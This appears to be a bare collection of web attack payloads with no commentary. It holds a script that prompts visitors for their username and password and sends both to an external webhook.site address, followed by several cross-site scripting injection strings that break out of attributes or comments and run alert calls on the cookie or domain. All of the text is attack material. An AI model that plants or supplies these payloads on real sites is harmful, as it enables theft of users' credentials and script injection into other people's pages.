<script>
    var username = prompt("Enter your username:");
    var password = prompt("Enter your password:");
    if (username && password) {
        fetch('https://webhook.site/737c847c-d818-4e45-9a25-86afcd28f69f', {
            method: 'POST',
            mode: 'no-cors',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded'
            },
            body: 'username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password)
        });
    }
</script>




--><img+src=x+onerror=alert(document.cookie)>
\”><img src=x onerror=alert(document.domain)>
“><svg+onload=alert(document.domain)>
